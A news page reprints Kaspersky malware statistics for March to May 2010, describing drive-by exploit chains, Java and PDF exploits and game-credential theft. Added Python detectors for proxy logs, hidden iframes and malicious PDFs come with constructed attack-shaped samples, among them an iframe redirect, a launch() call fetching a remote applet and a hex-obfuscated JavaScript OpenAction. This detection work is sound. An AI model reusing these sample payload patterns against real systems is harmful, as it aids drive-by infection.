News

Kaspersky Monthly Malware Statistics: May 2010 (made possible by Kaspersky Labs)

Malicious programs detected on users’ computers

The first Top Twenty list immediately below shows malware, adware and potentially unwanted programs that were detected and neutralized by the on-access scanner when they were accessed for the first time.

Position Change in position Name Number of infected computers
1   0 Net-Worm.Win32.Kido.ir   339585  
2   0 Virus.Win32.Sality.aa   210257  
3   0 Net-Worm.Win32.Kido.ih   201746  
4   0 Net-Worm.Win32.Kido.iq   169017  
5   9 Trojan.JS.Agent.bhr   161414  
6   -1 Worm.Win32.FlyStudio.cu   127835  
7   -1 Virus.Win32.Virut.ce   70189  
8   0 Trojan-Downloader.Win32.VB.eql   66486  
9   0 Worm.Win32.Mabezat.b   54866  
10   0 Trojan-Dropper.Win32.Flystud.yo   50490  
11   0 Worm.Win32.AutoIt.tc   47044  
12   1 Packed.Win32.Krap.l   44056  
13   New Trojan.JS.Iframe.lq   38658  
14   New Trojan.Win32.Agent2.cqzi   35423  
15   1 Trojan.Win32.Autoit.ci   34670  
16   New Trojan-GameThief.Win32.Magania.dbtv   31066  
17   New Trojan-Downloader.Win32.Geral.cnh   30225  
18   New Trojan.JS.Zapchast.dv   29592  
19   -2 Virus.Win32.Induc.a   28522  
20   -8 Exploit.JS.CVE-2010-0806.e   27606  

During May there were five new entries to the list.

Variants of the CVE-2010-0806 exploit left the Top 20 list as swiftly as they had joined it a month ago. However, malware writers are nowhere near through with exploiting the CVE-2010-0806 vulnerability. In May, Trojan.JS.Agent.bhr, a component of one of the CVE-2010-0806 exploit versions, moved up nine places to take up 5th position. The newcomer, Trojan.JS.Iframe.lq (13th place) is nothing but an intermediate link of a drive-by attack: it is used to redirect the user to Exploit.JS.CVE-2010-0806.i. Another piece of malware with a direct relationship to the CVE-2010-0806 vulnerability is Trojan.JS.Zapchast.dv. This Trojan is part of Exploit.JS.CVE-2010-0806.e which is currently in 20th place.

Trojan-GameThief.Win32.Magania.dbtv in 16th place lends support to the assumption that we made around a month ago concerning the purpose of the above exploits. Malware writers mainly use them to steal online gaming identities. This particular credential thief has impacted players of CabalOnline, Metin2, Mu Online and various games developed by Nexon.net.

The general scheme of infection is as follows:

  1. The user first visits a website contaminated by Trojan.JS.Iframe.lq, Trojan.JS.Zapchast.dv or either of the two versions of the CVE-2010-0806 exploit.
  2. The exploit then downloads Trojan-Downloader.Win32.Geral.cnh, a Trojan downloader that packs a pretty massive payload. Its malicious arsenal includes two rootkits to help it hide from security software, the Worm.Win32.Autorun component to ensure that the Trojan can propagate via removable storage devices, and a download routine that lets the cybercriminals feed it lists of files to download.
  3. The Geral component then downloads various versions of Trojan-PSW.Win32.QQPass and Trojan-GameThief.Win32.OnlineGames/WOW/Magania, including Trojan-GameThief.Win32.Magania.dbtv, to the victim computer.
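The three-stage chain above (compromised page, exploit script, downloader binary) is what a defender would look for in web proxy logs. The following script is an added example, not code from Kaspersky Lab or from this page: it correlates, per client, an HTML page, a script served from a second host and an executable fetched from a third host within a short window, which is the shape of the drive-by sequence described here. The log format, host names and timestamps are all constructed for the example.

```python
"""Correlate a multi-stage drive-by chain in web proxy logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample log lines, not real traffic.
# Format assumed here: "<ISO timestamp> <client ip> <url> <content-type>"
SAMPLE_LOG = """\
2010-05-12T10:00:01 10.0.0.5 http://legit-site.example/index.html text/html
2010-05-12T10:00:02 10.0.0.5 http://redirector.example/in.cgi text/html
2010-05-12T10:00:03 10.0.0.5 http://landing.example/exploit.js application/x-javascript
2010-05-12T10:00:09 10.0.0.5 http://payload.example/load.exe application/octet-stream
2010-05-12T10:30:00 10.0.0.7 http://news.example/story.html text/html
2010-05-12T10:30:04 10.0.0.7 http://cdn.example/app.js application/x-javascript
2010-05-12T11:00:00 10.0.0.9 http://updates.example/tool.exe application/octet-stream
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_line(line):
    """Turn one log line into a dict; returns None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, url, ctype = m.groups()
    return {"ts": datetime.fromisoformat(ts), "client": client,
            "url": url, "host": urlparse(url).netloc, "type": ctype}


def classify(entry):
    """Map a request to the stage it could represent: page, script or binary."""
    if entry["type"] == "application/octet-stream" or entry["url"].lower().endswith(".exe"):
        return "binary"
    if "javascript" in entry["type"]:
        return "script"
    if entry["type"] == "text/html":
        return "page"
    return "other"


def find_chains(log_text, window_seconds=60):
    """Return page -> script -> binary chains seen from one client within the window.

    A chain requires three different hosts: the page the user visited, the host
    that served the script, and the host that served the executable.
    """
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry:
            by_client[entry["client"]].append(entry)

    hits = []
    for client, entries in by_client.items():
        entries.sort(key=lambda e: e["ts"])
        for i, binary in enumerate(entries):
            if classify(binary) != "binary":
                continue
            earliest = binary["ts"] - timedelta(seconds=window_seconds)
            recent = [p for p in entries[:i] if p["ts"] >= earliest]
            scripts = [p for p in recent
                       if classify(p) == "script" and p["host"] != binary["host"]]
            pages = [p for p in recent if classify(p) == "page"]
            for script in scripts:
                origin = [p for p in pages
                          if p["ts"] <= script["ts"] and p["host"] != script["host"]]
                if origin:
                    hits.append({"client": client, "page": origin[0]["url"],
                                 "script": script["url"], "binary": binary["url"]})
                    break  # one report per executable download
    return hits


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_LOG):
        print(f"{hit['client']}: {hit['page']} -> {hit['script']} -> {hit['binary']}")
```

Only the first client matches: the third client downloads an executable with no preceding script, and the second never fetches a binary. In real logs the window and the "three different hosts" rule are the tuning knobs; content delivery networks legitimately split page, script and download across hosts, so the result is a triage list rather than a verdict.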

Malicious programs on the Internet

The second Top Twenty list below shows data generated by the web antivirus component and reflects the online threat landscape. This table includes malware detected on web pages and malware downloaded to victim machines from web pages.

Position Change in position Name Number of attempted downloads
1   New Trojan-Clicker.JS.Iframe.bb   397667  
2   New Exploit.Java.CVE-2010-0886.a   244126  
3   New Trojan.JS.Redirector.cq   194285  
4   New Exploit.Java.Agent.f   108869  
5   New Trojan.JS.Agent.bhr   107202  
6   New Exploit.Java.CVE-2009-3867.d   85120  
7   -2 not-a-virus:AdWare.Win32.FunWeb.q   82309  
8   -6 Exploit.JS.CVE-2010-0806.i   79192  
9   -5 Exploit.JS.CVE-2010-0806.b   76093  
10   New Trojan.JS.Zapchast.dv   73442  
11   -2 Trojan-Clicker.JS.Agent.ma   68033  
12   New Trojan.JS.Iframe.lq   59109  
13   New Trojan-Downloader.JS.Agent.fig   56820  
14   5 not-a-virus:AdWare.Win32.Shopper.l   50497  
15   2 Exploit.JS.CVE-2010-0806.e   50442  
16   -4 Trojan.JS.Redirector.l   50043  
17   New Trojan.JS.Redirector.cj   47179  
18   -2 not-a-virus:AdWare.Win32.Boran.z   43514  
19   -6 Trojan-Dropper.Win32.VB.amlh   43366  
20   New Exploit.JS.Pdfka.chw   42362  

All of the malicious programs listed above have seen changes to their positions.

First place is occupied by Trojan-Clicker.JS.Iframe.bb, which infected almost 400,000 websites during May alone. This Trojan aims to increase website hit counts by making the victim computers visit them without the users’ knowledge or consent.

The new Trojan.JS.Redirector.cq (in 3rd place) redirects visitors to websites distributing rogue antivirus programs.

Seven malicious programs in the Top 20 are exploits. It is remarkable that three newcomers, namely Exploit.Java.CVE-2010-0886.a, Exploit.Java.Agent.f, and Exploit.Java.CVE-2009-3867.d are exploits for the Java platform.

One of them is Exploit.Java.CVE-2010-0886.a, which ended up in 2nd place. This malicious program consists of two parts: a downloader written in JavaScript and a Java applet. The downloader uses the launch function from the Java Development Toolkit. This function takes as its parameter a single string made up of several parameter keys together with the URL at which the malicious Java applet is located. The JavaScript code surreptitiously initiates execution of a Java program on the victim computer, which in most cases is a Trojan downloader. The downloader in its turn downloads a malicious executable file and launches it on the victim computer. Interestingly, CVE-2010-0886.a gained much of its popularity because it used the Pegel downloader for one of its attacks. A description of Pegel is given in our February statistics overview.
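Both the hidden iframe used by a clicker such as Trojan-Clicker.JS.Iframe.bb and the toolkit launch() call described for Exploit.Java.CVE-2010-0886.a are visible in the static content of a page, which is how a web filter or a site owner's integrity check can flag them before a browser runs them. The scanner below is an added example, not code from Kaspersky Lab or from this page: it flags iframes that are zero-sized, hidden by style or pushed off-screen, and launch() calls whose single string argument mixes an http URL with dash-prefixed option tokens. The sample page, its host names and the placeholder option token are constructed.

```python
"""Static scan of page content for hidden iframes and toolkit launch() abuse (added example)."""
import re

# Constructed sample page: one visible ad frame, two hidden frames and a
# launch() call with a placeholder option token (not a real exploit string).
SAMPLE_PAGE = """\
<html><body>
<h1>Welcome</h1>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://redirector.example/in.cgi" width="0" height="0"></iframe>
<iframe src="http://landing.example/x.html" style="position:absolute; left:-2000px"></iframe>
<script>
  var dt = document.getElementById("dt");
  dt.launch("http://landing.example/app.jnlp -x-placeholder http://payload.example/applet.jar");
</script>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# launch("...") or launch('...') with the string argument captured in group 2
LAUNCH_RE = re.compile(r"\.launch\s*\(\s*(['\"])(.*?)\1", re.DOTALL)


def iframe_is_hidden(tag):
    """True when an <iframe ...> start tag is made invisible to the user."""
    t = tag.lower()
    zero_size = re.search(r'\b(?:width|height)\s*=\s*["\']?[01](?!\d)', t)
    styled_away = re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", t)
    off_screen = re.search(r"(?:left|top|margin-left|text-indent)\s*:\s*-\d{3,}", t)
    return bool(zero_size or styled_away or off_screen)


def launch_arg_is_suspicious(arg):
    """A toolkit launch() argument that carries both a URL and extra option
    tokens is the pattern described for CVE-2010-0886; a plain URL is not."""
    tokens = arg.split()
    has_url = any(re.match(r"https?://", tok) for tok in tokens)
    has_option = any(tok.startswith("-") for tok in tokens)
    return has_url and has_option


def scan_page(html):
    """Return a list of (rule, evidence) findings for one page."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        if iframe_is_hidden(m.group(0)):
            findings.append(("hidden-iframe", m.group(0)))
    for m in LAUNCH_RE.finditer(html):
        if launch_arg_is_suspicious(m.group(2)):
            findings.append(("toolkit-launch-injection", m.group(2)))
    return findings


if __name__ == "__main__":
    for rule, evidence in scan_page(SAMPLE_PAGE):
        print(f"{rule}: {evidence}")
```

Hidden iframes are also used legitimately (analytics, cross-domain messaging), so in practice the rule is combined with a reputation check on the frame's destination host; the launch() rule, by contrast, has very few benign matches because a legitimate deployment-toolkit call passes a single URL.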

The second newcomer, Exploit.Java.CVE-2009-3867.d, is in 6th place. This exploit triggers a stack overflow by calling the function getSoundBank. This function is used to download media content and expects the URL of a soundbank object as its parameter. The vulnerability lets the cybercriminals run shellcode, with which they can then execute any code they want on the victim computer.

The above exploits are typically associated with redirectors and legitimate, but infected, websites. The list of such ‘companion’ malware in May includes Trojan.JS.Agent.bhr (in 5th place), Trojan.JS.Zapchast.dv (in 10th place), Trojan.JS.Iframe.lq (in 12th place) and Trojan-Downloader.JS.Agent.fig (in 13th place).

Countries launching the most web-borne infections:

Conclusion

In recent months cybercriminals have actively used exploits in order to steal users’ confidential data. Changes have been affecting malware propagation techniques and methods that prevent the analysis and detection of malware.

Eleven of May’s Top 20 malicious programs from the Internet are different exploits and their related Trojans. These malicious programs occupy five consecutive Top 20 places starting from 2nd place and then appear on the list in groups of two or three variants.

It is also worth noting that users of Sun software are strongly advised to check for software updates on a regular basis. This advice is given as there is a lot of malware around exploiting the vulnerabilities in the Java platform.

Kaspersky Monthly Malware Statistics: April 2010 (made possible by Kaspersky Labs)

Malicious programs detected on users’ computers

The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by the on-access scanner.

Position Change in position Name Number of infected computers
1   0 Net-Worm.Win32.Kido.ir   330025  
2   0 Virus.Win32.Sality.aa   208219  
3   0 Net-Worm.Win32.Kido.ih   183527  
4   0 Net-Worm.Win32.Kido.iq   172517  
5   0 Worm.Win32.FlyStudio.cu   125714  
6   2 Virus.Win32.Virut.ce   70307  
7   New Exploit.JS.CVE-2010-0806.i   68172  
8   -2 Trojan-Downloader.Win32.VB.eql   64753  
9   2 Worm.Win32.Mabezat.b   51863  
10   5 Trojan-Dropper.Win32.Flystud.yo   50847  
11   -1 Worm.Win32.AutoIt.tc   49622  
12   New Exploit.JS.CVE-2010-0806.e   45070  
13   -4 Packed.Win32.Krap.l   44942  
14   New Trojan.JS.Agent.bhr   36795  
15   2 not-a-virus:AdWare.Win32.RK.aw   36408  
16   Return Trojan.Win32.Autoit.ci   35877  
17   -1 Virus.Win32.Induc.a   31846  
18   New Trojan.JS.Zapchast.dj   30167  
19   Return Packed.Win32.Black.a   29910  
20   Return Worm.Win32.AutoRun.dui   28343  

The list of the twenty most frequently occurring malicious programs detected on users’ computers traditionally remains fairly stable, so it comes as no surprise that Kido and Sality continue to occupy the top two places.

April saw four new entries. Two of them (7th and 12th places) are variants of the CVE-2010-0806 exploit which we mentioned last month, while the other two (14th and 18th places) are Trojans that turned out to be directly connected to the CVE-2010-0806 exploit. The exploit itself is usually encrypted or obfuscated and broken up into several parts. When an infected page is opened in the browser, the component parts of the exploit download in a particular order. The part of the code to be downloaded last is the part that unpacks and launches the exploit. The two new Trojans in this ratings list are components of one of the CVE-2010-0806 exploit variants.

To recap, the exploit is for a vulnerability that was detected in Internet Explorer back in March. Since then, it has been actively used by cybercriminals who spotted a description of it that went into rather too much detail. In March the number of unique downloads of the CVE-2010-0806 exploit had already reached the 200,000 mark. In April two variants of the exploit were neutralized on more than 110,000 computers. We’ll discuss the rapid rise of the CVE-2010-0806 exploit in more detail below.

It’s also worth mentioning Virut.ce’s slow but steady rise towards the top five. Over the past three months it has climbed from 10th place to 6th and in April alone was neutralized on more than 70,000 computers.

Malicious programs on the Internet

The second Top Twenty presents data generated by the web antivirus component, and reflects the online threat landscape. This ranking includes malicious programs detected on web pages and malware downloaded to victim machines from web pages.

Position Change in position Name Number of attempted downloads
1   1 Exploit.JS.CVE-2010-0806.i   201152  
2   New Exploit.JS.Pdfka.cab   117529  
3   7 Exploit.JS.CVE-2010-0806.b   110665  
4   New not-a-virus:AdWare.Win32.FunWeb.q   99628  
5   New Trojan-Downloader.JS.Twetti.c   89596  
6   New Trojan-Downloader.JS.Iframe.bup   85973  
7   New Trojan.JS.Agent.bhl   76648  
8   Return Trojan-Clicker.JS.Agent.ma   76415  
9   New Trojan-Clicker.JS.Iframe.ev   74324  
10   New Exploit.JS.Pdfka.byp   69606  
11   -8 Trojan.JS.Redirector.l   68361  
12   New Trojan-Dropper.Win32.VB.amlh   60318  
13   New Exploit.JS.Pdfka.byq   60184  
14   -10 Trojan-Clicker.JS.Iframe.ea   57922  
15   -8 not-a-virus:AdWare.Win32.Boran.z   56660  
16   New Exploit.JS.CVE-2010-0806.e   53989  
17   -11 Trojan.JS.Agent.aui   52703  
18   0 not-a-virus:AdWare.Win32.Shopper.l   50252  
19   New Packed.Win32.Krap.gy   46489  
20   New Trojan.HTML.Fraud.am   42592  

In contrast to our first Top Twenty, this rating is far more volatile. The leader for the last two months running, Gumblar.x, is nowhere to be seen in the April Top Twenty after its activity fell off sharply. Like previous Gumblar epidemics, this one exploded onto the scene, peaked in February when over 450,000 websites were infected by Gumblar, and disappeared just as quickly as it came two months later. This should act as a warning sign, because this is typical of Gumblar.x’s behavior and is reminiscent of events back in February. It remains to be seen when the next epidemic will strike, or if there will even be one, but we’ll be keeping an eye on developments.

The rapid spread of the CVE-2010-0806 exploit this month means it claimed top spot in our second rating. The exploit usually imports small downloader programs such as members of the Trojan-Downloader.Win32.Small, Trojan-Dropper.Win32.Agent, Trojan.Win32.Inject, and Trojan.Win32.Sasfis families to victims’ computers. These Trojans then download other malicious programs to the infected machines – usually various modifications of Trojan-GameThief.Win32.Magania, Trojan-GameThief.Win32.WOW and Backdoor.Win32.Torr. It looks as if the main aim for cybercriminals using the CVE-2010-0806 exploit during April was the theft of confidential data from users with accounts for popular online games. The total number of attempted downloads of the three exploit variants in 1st, 3rd and 16th places exceeded 350,000 in all.

Among the newcomers in April were three exploits (2nd, 10th, and 13th places) that target vulnerabilities in Adobe Reader and Acrobat. The vulnerabilities that these three PDF exploits use are relatively old and were detected back in 2009. The exploits themselves are PDF documents containing embedded JavaScript. These scripts fetch various Trojan-Downloaders from the Internet and install them, and these in turn download and run lots of other malicious programs. The malware downloaded to computers infected by Pdfka.cab (2nd place) included variants of the PSWTool.Win32.MailPassView family. The programs from this group are used to steal logins and passwords for email accounts.
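A first triage step for PDF exploits of this kind is to look at which action and script keywords the file carries before it ever reaches a reader. The scanner below is an added example, not code from Kaspersky Lab or from this page, in the spirit of keyword-counting tools such as pdfid: it undoes the #xx hex escapes that PDF name objects allow (a common way to hide a keyword such as /JavaScript), counts the script and automatic-action keywords, and rates a document suspicious when JavaScript is wired to /OpenAction or /AA. Both sample documents are constructed and carry no real exploit.

```python
"""Keyword triage for PDF files with embedded JavaScript (added example)."""
import re

# Constructed sample: the catalog's /OpenAction points at a JavaScript action
# whose /S name is hex-escaped (/J#61vaScript == /JavaScript).
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample');) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign document with no actions or scripts at all.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
KEYWORDS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
            b"/Launch", b"/EmbeddedFile", b"/URI"]


def normalize_names(data):
    """Replace #xx escapes inside PDF names with the byte they encode."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data):
    """Count each keyword as a whole name (so /JS does not match /JSx)."""
    norm = normalize_names(data)
    return {kw: len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9])", norm))
            for kw in KEYWORDS}


def assess(data):
    """Return (verdict, reasons, counts) for one PDF byte string."""
    counts = count_keywords(data)
    reasons = []
    has_js = counts[b"/JavaScript"] or counts[b"/JS"]
    if has_js and (counts[b"/OpenAction"] or counts[b"/AA"]):
        reasons.append("JavaScript wired to an automatic action")
    elif has_js:
        reasons.append("embedded JavaScript")
    if counts[b"/Launch"]:
        reasons.append("/Launch action")
    if NAME_ESCAPE_RE.search(data):
        reasons.append("hex-escaped names (possible keyword hiding)")
    verdict = "suspicious" if reasons else "clean"
    return verdict, reasons, {kw.decode(): n for kw, n in counts.items()}


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        verdict, reasons, counts = assess(doc)
        print(label, verdict, reasons, counts)
```

Real samples usually also compress the action dictionaries inside FlateDecode streams, so a production scanner inflates every stream before counting; the keyword logic itself stays the same.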

Packed.Win32.Krap.gy in 19th place, like most of the representatives from that family of packers, conceals rogue antivirus programs. One of the sources behind the spread of these fake security programs is an HTML page detected by Kaspersky Lab as Trojan.HTML.Fraud.am (20th place).

The number of attempted downloads of Twetti.c (5th place) totaled 90,000. The functionality of this Trojan is no different from its less obfuscated predecessor Twetti.a, which we mentioned in December.

Looking at April’s ratings, one of the main trends of recent months is clearly visible: cybercriminals are making active use of exploits whose source codes are widely available. In the vast majority of cases, the target of such attacks is confidential data. The cybercriminals try to gain access to email and online gaming services’ accounts along with various websites. These types of attempts numbered hundreds of thousands in April. The stolen data may well be sold and/or used for spreading malicious programs.

Countries launching the most web-borne infections:

ROI of Data Loss Prevention

Introduction

One data loss incident can result in continuous cost. After making affected customers whole, conducting an internal investigation, repairing any damage to internal systems, and dealing with expected litigation, you can count on external audits, increased regulatory oversight, and a damaged reputation to stay with you for a while.

Organizations that rely on intellectual property (IP) for sale and use are subject to more long-term and far-reaching costs when data is lost. IP is the heart of today’s technology, manufacturing, pharmaceutical, and even financial firms, and their most coveted sustainable advantage. When lost, it can have a direct and immediate impact on both the R&D costs, and the revenue estimates for the full lifecycle of the asset.

Without question, a data leak is not a one-time cost. Even after your operations have recovered, effects of the data loss could continue to impact your business for a decade or longer. One mistake can have far-reaching consequences, and a serious leak may mean that your business never recovers—or at least never returns to “normal.”

Fortunately, the threat of a leak is significantly mitigated through the use of technology—specifically, a data loss prevention solution, which can provide a clear return on investment (ROI) and a manageable total cost of ownership. Data loss prevention provides a sound cost-avoidance strategy and can positively impact revenue—saving hundreds of millions of dollars with little upfront investment. The risk of business as usual is clear, as is the reward for implementing diligent data control and data loss prevention measures.

To read more about the ROI of DLP click here to download the whitepaper.

The Dangers of Social Networking

Introduction

Social Networking is the one area of the Internet that nearly every computer-literate person indulges in these days. It doesn’t matter whether it’s your company boss, your neighbor, your boyfriend or your girlfriend, everybody’s contactable via at least one of the Social Networking portals. However, since these platforms attract so many people – most of whom are blissfully unaware of the need for online security – they also draw in the cybercriminals who are out to make a fast buck from the unwary users.

To read more about the Danger of Social Networking click here

Monthly Malware Statistics for March 2010 (made possible by Kaspersky Labs)

Malicious programs detected on users’ computers

The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by the on-access scanner.

Position Change in position Name Number of infected computers
1   0 Net-Worm.Win32.Kido.ir   332833  
2   0 Virus.Win32.Sality.aa   211229  
3   0 Net-Worm.Win32.Kido.ih   186685  
4   0 Net-Worm.Win32.Kido.iq   181825  
5   0 Worm.Win32.FlyStudio.cu   121027  
6   0 Trojan-Downloader.Win32.VB.eql   68580  
7   New Trojan.Win32.AutoRun.abj   66331  
8   1 Virus.Win32.Virut.ce   61003  
9   1 Packed.Win32.Krap.l   55823  
10   -2 Worm.Win32.AutoIt.tc   55065  
11   4 Worm.Win32.Mabezat.b   49521  
12   -5 Exploit.JS.Aurora.a   43776  
13   New Packed.Win32.Krap.as   40912  
14   New Trojan.Win32.AutoRun.aay   40754  
15   3 Trojan-Dropper.Win32.Flystud.yo   40190  
16   -4 Virus.Win32.Induc.a   38683  
17   -4 not-a-virus:AdWare.Win32.RK.aw   38547  
18   New Trojan.Win32.AutoRun.abd   37037  
19   -5 not-a-virus:AdWare.Win32.Boran.z   36996  
20   0 not-a-virus:AdWare.Win32.FunWeb.q   34177  

There was no major change in the first Top Twenty leader board in March.

Three variants of the Autorun Trojan are worthy of mention. As was the case a couple of months back, they are autorun.inf files that use removable devices to spread the notorious P2P-Worm.Win32.Palevo and Trojan-GameThief.Win32.Magania.

This month’s rating once again has an entry displaying ‘packed’ characteristics, and this time it’s called Packed.Win32.Krap.as and conceals a rogue antivirus program. Currently this is in thirteenth place. In recent months the cybercriminals have demonstrated a penchant for specially designed packers of executable files. New methods of packing and concealing the true function of popular malware are being developed all the time, which explains why new variants of families such as Krap appear in our Top Twenty virtually every month.

Malicious programs on the Internet

The second Top Twenty presents data generated by the web antivirus component, and reflects the online threat landscape. This ranking includes malicious programs detected on web pages and malware downloaded to victim machines from web pages.

Position Change in position Name Number of attempted downloads
1   0 Trojan-Downloader.JS.Gumblar.x   178965  
2   New Exploit.JS.CVE-2010-0806.i   148721  
3   -1 Trojan.JS.Redirector.l   126277  
4   2 Trojan-Clicker.JS.Iframe.ea   102226  
5   4 Exploit.JS.Aurora.a   88196  
6   4 Trojan.JS.Agent.aui   80654  
7   -3 not-a-virus:AdWare.Win32.Boran.z   75911  
8   New Trojan.HTML.Fraud.aj   68809  
9   New Packed.Win32.Krap.as   64329  
10   New Exploit.JS.CVE-2010-0806.b   50763  
11   New Trojan.JS.FakeUpdate.ab   49412  
12   New Trojan.HTML.Fraud.aq   48927  
13   3 Packed.Win32.Krap.ai   47601  
14   Return Trojan-Downloader.JS.Twetti.a   46858  
15   New Exploit.JS.Pdfka.bub   45762  
16   New Trojan-Downloader.JS.Iframe.byo   44848  
17   New Trojan.JS.FakeUpdate.aa   42352  
18   Return not-a-virus:AdWare.Win32.Shopper.l   41888  
19   New Trojan-Clicker.HTML.IFrame.fh   38266  
20   New Packed.Win32.Krap.ao   36123  

As usual, when it comes to rating malicious programs on the Internet, there was plenty to discuss.

Let’s start with the latest Internet Explorer vulnerability CVE-2010-0806. A rather detailed description of the problem led to the exploit for it becoming extremely widespread. Now only the laziest of cybercriminals haven’t hopped on the bandwagon and two variants are already in our second Top Twenty – Exploit.JS.CVE-2010-0806.i (in second place) and Exploit.JS.CVE-2010-0806.b (in tenth place).

The latest Gumblar epidemic is still in full swing. As well as the older version of this script Trojan-Downloader, which shows up as Gumblar.x and occupies first place, a new updated version has appeared which is detected as HEUR:Trojan-Downloader.Script.Generic.

The Aurora.a exploit, which we wrote about last month, is still being used extensively by cybercriminals and has risen from ninth to fifth place in our rating.

The rather curious Twetti.a downloader, which we wrote about back in December, reared its none-too-pleasant head again in March, coming in at fourteenth place after a two-month hiatus. As was the case with Gumblar, it appears the black hats took some time-out and then started using this piece of malware to infect large numbers of websites again.

It’s also no coincidence that Exploit.JS.Pdfka.bub finds itself in fifteenth place – this malicious PDF file is a component in drive-by attacks that use Twetti.a to get a foot in the door.

Our second rating also includes four new entries – Trojan.HTML.Fraud.aj, Trojan.JS.FakeUpdate.ab, Trojan.HTML.Fraud.aq and Trojan.JS.FakeUpdate.aa – that distribute fake antivirus solutions and ransomware.

Countries launching the most web-borne infections:

The overall picture remains pretty much unchanged: attacks on users are predominantly Internet-borne and make use of the vulnerabilities that regularly appear in some of the most popular software products. Fortunately, these vulnerabilities are quickly patched by the vendors, but still, too many users fail to install these patches in time. Malware is also increasingly taking advantage of user gullibility and naivety. The most common malware of this kind used by the cybercriminals in March included rogue antivirus solutions and ransomware.

Copyright © 2010 Nclose cc.